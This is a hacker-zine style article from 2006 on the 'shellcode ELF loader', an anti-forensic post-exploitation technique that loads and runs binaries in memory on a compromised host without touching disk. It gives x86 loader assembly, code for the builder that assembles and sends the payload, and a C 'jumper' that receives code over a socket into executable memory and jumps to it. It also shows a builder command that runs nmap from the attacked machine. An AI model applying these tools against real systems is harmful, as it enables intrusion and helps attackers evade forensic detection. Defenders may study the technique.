Advanced Antiforensics

Osiris · Feb 3, 2006

1 - Introduction
2 - Userland Execve
3 - Shellcode ELF loader
4 - Design and Implementation
4.1 - The lxobject
4.1.1 - Static ELF binary
4.1.2 - Stack context
4.1.3 - Shellcode loader
4.2 - The builder
4.3 - The jumper
5 - Multiexecution
5.1 - Gits
6 - Conclusion
7 - Greetings
8 - References
A - Tested systems
B - Sourcecode

---[ 1 - Introduction

Techniques for exploiting remote services have made substantial progress.
At the same time, the range of available shellcodes has grown and now
incorporates new and complex anti-detection techniques such as
polymorphism.

In spite of the advantages all this gives attackers, a call to the execve
syscall is still always needed, which gives rise to a series of
problems:

- The access to the syscall execve may be denied if the host uses some
kind of modern protection system.

- The call to execve requires the file to be executed to reside on the
hard disk. Consequently, if '/bin/sh' does not exist, which is
common in chroot environments, the shellcode will not execute
properly.

- The host may lack tools that the intruder needs, which creates the
need to upload them and can leave traces of the intrusion on disk.

Hence the need for a shellcode that solves these problems. The solution is
found in the 'userland exec'.

---[ 2 - Userland Execve

The procedure that allows the local execution of a program without using
the execve syscall is called 'userland exec' or 'userland execve'. It is
basically a mechanism that reproduces, correctly and in order, most of the
steps the kernel follows to load an executable file into memory and start
its execution. It can be summarized in just three steps:

- Load the binary's required segments into memory.
- Initialize the stack context.
- Jump to the entry point (starting point).

The main aim of the 'userland exec' is to load binaries without using the
kernel's execve syscall, which solves the first of the problems stated
above. Since it is our own implementation, we can also adapt its features
to our needs. We'll make it read the ELF file not from the hard disk but
from another source, such as a socket. This solves the other two problems,
because the file '/bin/sh' no longer needs to be visible to the exploited
process but can be read from the network, and tools that don't reside on
the destination host can be executed as well.

The first public implementation of an execve in user space was made by
"the grugq" [1]. Its code and inner workings are perfect, but it has
some disadvantages:

- It doesn't work for real attacks.
- The code is too large and difficult to port.

For these reasons we decided to put our efforts into developing another
'userland execve' with the same features but with simpler code and
oriented to use in exploits. The final result is the 'shellcode ELF
loader'.

---[ 3 - Shellcode ELF loader

The shellcode ELF loader, or Self, is a new and sophisticated
post-exploitation technique based on the userland execve. It allows an ELF
binary to be loaded and executed on a remote machine without storing it on
disk or modifying the original filesystem. The goal of the shellcode ELF
loader is to provide exploits with an effective, modern post-exploitation
anti-forensic system that is also easy to use, so that an intruder can
execute as many applications as he desires.

---[ 4 - Design and Implementation

Obtaining an effective design hasn't been an easy task; different options
were considered and most of them were dropped. In the end, we selected the
most creative design, the one that allows the most flexibility and
portability and is very easy to use.

The final result is a mix of multiple pieces, independent of one another,
that each perform their own function and work together in harmony. There
are three pieces: the lxobject, the builder and the jumper. These elements
make the task of executing a binary on a remote machine quite easy. The
lxobject is a special kind of object that contains everything required to
replace the original executable of a guest process with a new one. The
builder and jumper are the pieces of code that build the lxobject, transfer
it from the local machine (attacker) to the remote machine (attacked) and
activate it.

Before describing the inner details of this technique, it is necessary to
understand how, when and where it must be used. Here follows a short
summary of its common use:

- 1st round, exploitation of a vulnerable service:

In the 1st round we have a machine X with a vulnerable service Y. We want to
exploit this juicy process, so we use a suitable exploit with the jumper as
its payload (shellcode). Once the service is exploited, the jumper is
executed and we're ready for the next round.

- 2nd round, execution of a binary:

Here is where the shellcode ELF loader takes part: an ELF binary is selected
and the lxobject is constructed. Then we send it to the jumper to be
activated. The result is the load and execution of the binary on the remote
machine. We win the battle!!

---[ 4.1 - The lxobject

What the **** is that? A lxobject is a self-loadable and auto-executable
object, that is to say, an object specially devised to completely replace the
original guest process where it is located with the ELF binary it carries,
and to start that binary's execution. Each lxobject is built on the
intruder's machine using the builder and is sent to the attacked machine,
where the jumper receives and activates it.

It can therefore be compared to a missile sent from one place to its point
of impact, with an executable as the explosive charge. This missile is
built from three assembled parts: a static ELF binary, a preconstructed
stack context and a shellcode loader.

---[ 4.1.1 - Static ELF binary

It's the first piece of a lxobject: the ELF binary that must be loaded and
executed on a remote host. It's just a common executable file, statically
compiled for the architecture and system on which it will be executed.

We decided to avoid dynamic executables because they would add unneeded
complexity to the loading code and noticeably raise the rate of possible
errors.

---[ 4.1.2 - Stack context

It's the second piece of a lxobject: the stack context that the binary will
need. Every process has an associated memory segment called the stack,
where functions store their local variables. During the binary load process,
the kernel fills this segment with a series of initial data required for
its subsequent execution. We call it the 'initial stack context'.

To ease portability, and especially the loading process, a preconstructed
stack context was adopted. That is to say, it is generated on our machine
and assembled with the ELF binary. The only knowledge required is its
format, so that the data can be added in the correct order. On the vast
majority of UNIX systems it looks like this:

              .----------------.
         .--> |   alignment    |
         |    |================|
         |    |      Argc      |  - Arguments (number)
         |    |----------------|
         |    |     Argv[]     | ---.      - Arguments (vector)
         |    |----------------|    |
         |    |     Envp[]     | ---|---.  - Environment variables (vector)
         |    |----------------|    |   |
         |    |  argv strings  | <--'   |
         |    |----------------|        |  - Argv and envp data (strings)
         |    |  envp strings  | <------'
         |    |================|
         '--- |   alignment    | -------> Upper and lower alignments
              '----------------'

This is the most reduced stack context that is still functional. As can be
observed, no auxiliary vector has been added, because working with static
executables avoids the need to worry about linking. Also, there is no
restriction on the number of arguments and environment variables; a bunch
of them increases the context's size but nothing more.

As the context is built on the attacker's machine, which will usually
differ from the attacked one, knowledge of the address space in which the
stack is placed is required. This is done automatically and doesn't pose a
problem.
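
To make the layout in the diagram concrete, here is a minimal sketch in C of
how such a context could be laid out in a buffer before it is attached to
the binary. It is not the builder's actual code: the function name
build_stack_context() and its parameters are hypothetical, pointers are
stored as 32-bit values in host byte order (so it assumes a little-endian
host building for x86), the alignment padding from the diagram is left out,
and each vector is closed with a NULL entry, as C start-up code generally
expects.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Store a 32-bit value at p without assuming alignment. */
static void put32(unsigned char *p, uint32_t v)
{
    memcpy(p, &v, sizeof v);
}

/* Lays out argc, argv[], envp[] and their strings in buf exactly as they
 * should appear at address `base` in the target process.
 * Returns the number of bytes used, or 0 if buf is too small.
 * (Hypothetical helper, for illustration only.) */
size_t build_stack_context(unsigned char *buf, size_t cap, uint32_t base,
                           int argc, const char *const argv[],
                           int envc, const char *const envp[])
{
    /* argc + argv[] + NULL + envp[] + NULL, one 32-bit slot each */
    size_t slots = 1 + (size_t)argc + 1 + (size_t)envc + 1;
    size_t str_off = slots * 4;      /* strings start after the vectors */
    size_t total = str_off;
    size_t slot = 0;
    int i;

    assert(buf != NULL && argc >= 0 && envc >= 0);
    for (i = 0; i < argc; i++)
        total += strlen(argv[i]) + 1;
    for (i = 0; i < envc; i++)
        total += strlen(envp[i]) + 1;
    if (total > cap)
        return 0;

    put32(buf + 4 * slot++, (uint32_t)argc);
    for (i = 0; i < argc; i++) {
        size_t n = strlen(argv[i]) + 1;
        /* pointer value as seen by the target: base + offset in context */
        put32(buf + 4 * slot++, base + (uint32_t)str_off);
        memcpy(buf + str_off, argv[i], n);
        str_off += n;
    }
    put32(buf + 4 * slot++, 0);      /* argv[] terminator */
    for (i = 0; i < envc; i++) {
        size_t n = strlen(envp[i]) + 1;
        put32(buf + 4 * slot++, base + (uint32_t)str_off);
        memcpy(buf + str_off, envp[i], n);
        str_off += n;
    }
    put32(buf + 4 * slot++, 0);      /* envp[] terminator */
    return total;
}
```

The `base` argument is where the knowledge of the remote stack address comes
in: every pointer in the two vectors is only valid once the buffer has been
copied to that address.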

---[ 4.1.3 - Shellcode loader

This is the third and also the most important part of a lxobject. It's a
shellcode that must carry out the loading and execution of a binary
file. It is really a simple but powerful implementation of userland execve().

The loading process takes the following steps to complete successfully
(x86, 32 bits):

* pre-loading: first, the jumper must do some operations before anything
else. It gets the memory address where the lxobject has been previously
stored and pushes it onto the stack, then it finds the loader code and
jumps to it. The loading has begun.

__asm__(
"push %0\n"
"jmp *%1"
:
: "c"(lxobject),"b"(*loader)
);

* loading step 1: scan the program header table and load each PT_LOAD
segment. The stack context has its own header, PT_STACK, so when this kind
of segment is found it is treated differently from the rest (step 2).

.loader_next_phdr:
// Check program header type (eax): PT_LOAD or PT_STACK
movl (%edx),%eax

// If program header type is PT_LOAD, jump to .loader_phdr_load
// and load the segment referenced by this header
cmpl $PT_LOAD,%eax
je .loader_phdr_load

// If program header type is PT_STACK, jump to .loader_phdr_stack
// and load the new stack segment
cmpl $PT_STACK,%eax
je .loader_phdr_stack

// If unknown type, jump to next header
addl $PHENTSIZE,%edx
jmp .loader_next_phdr

For each PT_LOAD segment (text/data) do the following:

* loading step 1.1: unmap the old segment, one page at a time, to be sure
that there is enough room to fit the new one:

movl PHDR_VADDR(%edx),%edi
movl PHDR_MEMSZ(%edx),%esi
subl $PG_SIZE,%esi
movl $0,%ecx
.loader_unmap_page:
pushl $PG_SIZE
movl %edi,%ebx
andl $0xfffff000,%ebx
addl %ecx,%ebx
pushl %ebx
pushl $2
movl $SYS_munmap,%eax
call do_syscall
addl $12,%esp
addl $PG_SIZE,%ecx
cmpl %ecx,%esi
jge .loader_unmap_page

* loading step 1.2: map the new memory region.

pushl $0
pushl $0
pushl $-1
pushl $MAPS
pushl $7
movl PHDR_MEMSZ(%edx),%esi
pushl %esi
movl %edi,%esi
andl $0xfffff000,%esi
pushl %esi
pushl $6
movl $SYS_mmap,%eax
call do_syscall
addl $32,%esp

* loading step 1.3: copy the segment from the lxobject to that place:

movl PHDR_FILESZ(%edx),%ecx
movl PHDR_OFFSET(%edx),%esi
addl %ebp,%esi
repz movsb

* loading step 1.4: continue with next header:

addl $PHENTSIZE,%edx
jmp .loader_next_phdr

* loading step 2: when both text and data segments have been loaded
correctly, it's time to setup a new stack:

.loader_phdr_stack:
movl PHDR_OFFSET(%edx),%esi
addl %ebp,%esi
movl PHDR_VADDR(%edx),%edi
movl PHDR_MEMSZ(%edx),%ecx
repz movsb

* loading step 3: to finish, some registers are cleared and then the loader
jumps to the binary's entry point or _init().

.loader_entry_point:
movl PHDR_ALIGN(%edx),%esp
movl EHDR_ENTRY(%ebp),%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
xorl %edx,%edx
xorl %esi,%esi
xorl %edi,%edi
jmp *%eax

* post-loading: the execution has begun.
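
For readers who prefer C to assembly, the header scan of step 1 and the
page arithmetic behind steps 1.1 and 1.2 can be sketched as below. This is
only an illustration that inspects an ELF image held in a buffer; it maps
and executes nothing. The names elf32_load_regions() and struct load_region
are hypothetical, PG_SIZE is assumed to be 4096 bytes, and the Linux
<elf.h> header is assumed to be available. The custom PT_STACK type is left
out because its numeric value is not given in the text.

```c
#include <assert.h>
#include <elf.h>      /* Elf32_Ehdr, Elf32_Phdr, PT_LOAD (Linux header) */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PG_SIZE 0x1000u   /* assumed page size */

/* Page-aligned region that covers one PT_LOAD segment. */
struct load_region {
    uint32_t base;    /* p_vaddr rounded down to a page boundary */
    uint32_t pages;   /* pages touched by [p_vaddr, p_vaddr + p_memsz) */
};

/* Walks the program header table of a 32-bit ELF image held in memory.
 * Records the region of each PT_LOAD header in out[0..max-1] and skips
 * every other type. Returns the number of regions stored, or -1 if the
 * headers do not fit inside the image. */
int elf32_load_regions(const unsigned char *img, size_t len,
                       struct load_region *out, int max)
{
    Elf32_Ehdr eh;
    Elf32_Phdr ph;
    unsigned i;
    int n = 0;

    assert(img != NULL && out != NULL);
    if (len < sizeof eh)
        return -1;
    memcpy(&eh, img, sizeof eh);          /* copy: img may be unaligned */
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_phentsize != sizeof ph)
        return -1;

    for (i = 0; i < eh.e_phnum && n < max; i++) {
        size_t off = (size_t)eh.e_phoff + (size_t)i * sizeof ph;
        uint32_t first, last;

        if (off > len || len - off < sizeof ph)
            return -1;                    /* table runs past the image */
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type != PT_LOAD || ph.p_memsz == 0)
            continue;                     /* unknown type: next header */

        first = ph.p_vaddr & ~(PG_SIZE - 1);
        last  = (ph.p_vaddr + ph.p_memsz - 1) & ~(PG_SIZE - 1);
        out[n].base  = first;
        out[n].pages = (last - first) / PG_SIZE + 1;
        n++;
    }
    return n;
}
```

Note that this sketch counts a trailing partial page as a full page, and
that it stops at e_phnum instead of relying on a terminating header type.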

As can be seen, the loader does nothing to build the stack context; it is
constructed in the builder. This way, a pre-designed context is available
and simply has to be copied to the right address inside the process.

Although a different loader has to be coded for each architecture, the
operations are plain and concrete. Where possible, hybrid loaders should be
designed that work on the same architecture but cope with the different
syscall methods of the UNIX systems. The loader we have developed for our
implementation is a hybrid code capable of working under Linux and BSD
systems on x86/32-bit machines.

---[ 4.2 - The builder

It has the mission of assembling the components of a lxobject and then
sending it to a remote machine. It works with a simple command line design
and its format is as follows:

./builder <host> <port> <exec> <argv> <envp>

where:

host, port = the attacked machine's address and the port where the jumper
is running and waiting

exec = the executable binary file we want to execute

argv, envp = string of arguments and string of environment variables,
needed by the executable binary

For instance, if we want to do some port scanning from the attacked host, we
will execute an nmap binary as follows:

./builder 172.26.0.1 2002 nmap-static "-P0;-p;23;172.26.1-30" "PATH=/bin"

Basically, the assembly operations performed are the following:

* allocate enough memory to store the executable binary file, the shellcode
loader and the stack's init context.

elf_new = (void*)malloc(elf_new_size);

* insert the executable into the memory area previously allocated and then
clear the fields that describe the section header table, because they
won't be useful to us as we are working with a static file. The section
header table itself could also be removed.

ehdr_new->e_shentsize = 0;
ehdr_new->e_shoff = 0;
ehdr_new->e_shnum = 0;
ehdr_new->e_shstrndx = 0;

* build the stack context. It requires two strings, the first one contains
the arguments and the second one the environment variables. Each item is
separated by using a delimiter. For instance:

<argv> = "arg1;arg2;arg3;-h"
<envp> = "PATH=/bin;SHELL=sh"

Once the context has been built, a new program header is added to the
binary's program header table. This is a PT_STACK header and contains all
the information which is needed by the shellcode loader in order to setup
the new stack.

* the shellcode ELF loader is introduced and its offset is saved within the
e_ident field in the elf header.

memcpy(elf_new + elf_new_size - PG_SIZE + LOADER_CODESZ, loader, LOADER_CODESZ);
ldr_ptr = (unsigned long *)&ehdr_new->e_ident[9];
*ldr_ptr = elf_new_size - PG_SIZE + LOADER_CODESZ;

* the lxobject is ready, now it's sent to the specified host and port.

connect(sfd, (struct sockaddr *)&srv, sizeof(struct sockaddr));
write(sfd, elf_new, elf_new_size);
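
As an illustration of the stack-context step above, the delimiter-separated
<argv> and <envp> strings could be turned into vectors with something like
the following. The helper name split_items() is hypothetical and is not
taken from the builder's source; it splits the string in place, so it must
be given a writable copy of the command-line argument.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Splits s in place on delim and stores up to max item pointers in out.
 * Returns the number of items stored; an empty string yields zero items.
 * (Hypothetical helper, for illustration only.) */
int split_items(char *s, char delim, char **out, int max)
{
    int n = 0;

    assert(s != NULL && out != NULL && delim != '\0');
    while (*s != '\0' && n < max) {
        char *d;

        out[n++] = s;                /* item starts here */
        d = strchr(s, delim);
        if (d == NULL)
            break;                   /* last item, no delimiter follows */
        *d = '\0';                   /* terminate the item */
        s = d + 1;                   /* continue after the delimiter */
    }
    return n;
}
```

With the nmap example from this section, the argument string
"-P0;-p;23;172.26.1-30" yields four items and "PATH=/bin" yields one. The
resulting counts and vectors are what a stack-context builder needs as
argc/argv and envp.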

An lxobject finished and assembled correctly, ready to be sent, looks like
this:

      [ Autoloadable and Autoexecutable Object ]
.------------------------------------------------
|
|           [ Static Executable File (1) ]
|       .--------------------------------.
|       |                                |
|       |    .----------------------.    |
|       |    | ELF Header )---------|----|--.
|       |    |----------------------|    |  | Shellcode Elf loader (3)
|       |    | Program Header Table |    |  | hdr->e_ident[9]
|       |    |                      |    |  |
|       |    | + PT_LOAD0           |    |  |
|       |    | + PT_LOAD1           |    |  |
|       |    | ...                  |    |  |
|       |    | ...                  |    |  |
|       |    | + PT_STACK )---------|----|--|--.
|       |    |                      |    |  |  | Stack Context (2)
|       |    |----------------------|    |  |  |
|       |    | Sections (code/data) |    |  |  |
|       '--> |----------------------| <--'  |  |
|       .--> |######################| <-----'  |
|       |    |## SHELLCODE LOADER ##|          |
|   P   |    |######################|          |
|   A   |    |                      |          |
|   G   |    |       .......        |          |
|   E   |    |       .......        |          |
|       |    |                      |          |
|       |    |######################| <--------'
|       |    |#### STACK CONTEXT ###|
|       |    |######################|
|       '--> '----------------------'
|
'-----------------
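
The hdr->e_ident[9] reference in the diagram works because the bytes of
e_ident from index 9 (EI_PAD in the Linux <elf.h>) up to index 15 are
unused padding. A hedged sketch of storing and reading back a loader offset
there is shown below. The function names are hypothetical, and a
fixed-width 32-bit type is used so that the value fits in the seven padding
bytes whatever the size of unsigned long is on the build machine.

```c
#include <assert.h>
#include <elf.h>      /* Elf32_Ehdr, EI_PAD, EI_NIDENT (Linux header) */
#include <stdint.h>
#include <string.h>

/* Stores a 32-bit file offset in the padding bytes of e_ident.
 * memcpy is used because e_ident[EI_PAD] is not 4-byte aligned.
 * (Hypothetical helper, for illustration only.) */
void ident_set_offset(Elf32_Ehdr *eh, uint32_t off)
{
    assert(eh != NULL);
    assert(EI_PAD + sizeof off <= EI_NIDENT);   /* must stay inside e_ident */
    memcpy(&eh->e_ident[EI_PAD], &off, sizeof off);
}

/* Reads the offset back from the same place. */
uint32_t ident_get_offset(const Elf32_Ehdr *eh)
{
    uint32_t off;

    assert(eh != NULL);
    memcpy(&off, &eh->e_ident[EI_PAD], sizeof off);
    return off;
}
```

The value is stored in host byte order, so writer and reader are assumed to
share the same endianness, as is the case between two x86 machines.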

---[ 4.3 - The jumper

It is the shellcode that an exploit has to use while exploiting a
vulnerable service. Its purpose is to activate the incoming lxobject, and
to achieve this at least the following operations must be done:

- open a socket and wait for the lxobject to arrive
- store it anywhere in memory
- activate it by jumping into the loader

Those are the minimal required actions, but it is important to keep in mind
that a jumper is a simple shellcode, so any other functionality can be
added beforehand: breaking a chroot, elevating privileges, and so on.

1) how to get the lxobject?

It is easily achieved with already known techniques, such as binding to a
port and waiting for new connections, or searching the process' FD table
for descriptors that belong to a socket. Additionally, cipher algorithms
can be added, but this would lead to huge shellcodes that are difficult to
use.

2) and where to store it?

There are three possibilities:

a) store it in the heap. We just have to find the current location of the
program break by using brk(0). However, this method is dangerous and
unsuitable because the lxobject could be unmapped or even entirely
overwritten during the loading process.

b) store it in the process stack. Provided there is enough space and we know
where the stack starts and finishes, this method can be used, but the
stack may not be executable, in which case it can't be applied.

c) store it in a newly mapped memory region by using the mmap() syscall.
This is the best way and the one we have used in our code.

Due to its nature, a jumper's code can be customized and adapted to many
different contexts. An example of a generic jumper written in C follows:

lxobject = (unsigned char*)mmap(0, LXOBJECT_SIZE,
PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0);

addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[1]));
addr.sin_addr.s_addr = 0;

sfd = socket(AF_INET, SOCK_STREAM, 0);
bind(sfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
listen(sfd, 10);
nsfd = accept(sfd, NULL, NULL);

for (i = 0 ; i < 255 ; i++) {
if (recv(i, tmp, 4, MSG_PEEK) == 4) {
if (!strncmp(&tmp[1], "ELF", 3)) break;
}
}

recv(i, lxobject, LXOBJECT_SIZE, MSG_WAITALL);

loader = (unsigned long *)&lxobject[9];
*loader += (unsigned long)lxobject;

__asm__(
"push %0\n"
"jmp *%1"
:
: "c"(lxobject),"b"(*loader)
);

---[ 5 - Multiexecution

The code included in this article is just a generic implementation of a
shellcode ELF loader, which allows a binary to be executed once at a time.
If we want to execute that binary an indefinite number of times (to pass
different arguments, test new features, etc.), we need to build and send a
new lxobject for each try. Although this obviously has some disadvantages,
it's enough for most situations. But what if what we really want is to
execute our binary many times from the other side, that is, from the
remote machine, without rebuilding the lxobject on ours?

To face this issue we have developed another technique called
"multi-execution". Multi-execution is a much more advanced derived
implementation. Its main feature is that the process of building a lxobject
is always done on the remote machine, so one binary allows unlimited
executions. It is something like working with a remote shell. One example
of a tool that uses a multi-execution environment is the gits project, or
"ghost in the system".

---[ 5.1 - Gits

Gits is a multi-execution environment designed to operate on attacked remote
machines and to limit the amount of forensic evidence. It should be viewed as
a proof of concept, an advanced extension with many features. It comprises a
launcher program and a shell, which is the main part. The shell lets you
retrieve as many binaries as desired and execute them as many times as
wished (a process of stack context rebuilding and binary patching is done
using some advanced techniques). Also, built-in commands, job control, flow
redirection, remote file manipulation, and so on have been added.

---[ 6 - Conclusion

Forensic techniques become more sophisticated and complete every day: where
there was no trace left, now there's a fingerprint; where there was only one
piece of evidence, now there are hundreds. It is a never-ending battle
between those who don't want to be detected and those who want to detect.
Using memory and leaving the disk untouched is a good policy to avoid
detection. The shellcode ELF loader carries out this kind of
post-exploitation plainly and elegantly.

---[ 7 - Greetings

7a69ezine crew & redbull.

---[ 8 - References

[1] The Design and Implementation of ul_exec - the grugq
http://securityfocus.com/archive/1/348638/2003-12-29/2004-01-04/0

[2] Remote Exec - the grugq
http://www.phrack.org/show.php?p=62&a=8

[3] Ghost In The System Project
http://www.7a69ezine.org/project/gits

---[ A - Tested systems

The next table summarizes the systems where we have tested all this ****ing
****.

             /----------v----------\
             |   x86    |  amd64   |
/------------+----------+----------<
| Linux 2.4  |  works   |  works   |
>------------+----------+----------<
| Linux 2.6  |  works   |  works   |
>------------+----------+----------<
| FreeBSD    |  works   | untested |
>------------+----------+----------<
| NetBSD     |  works   | untested |
\------------^----------^----------/
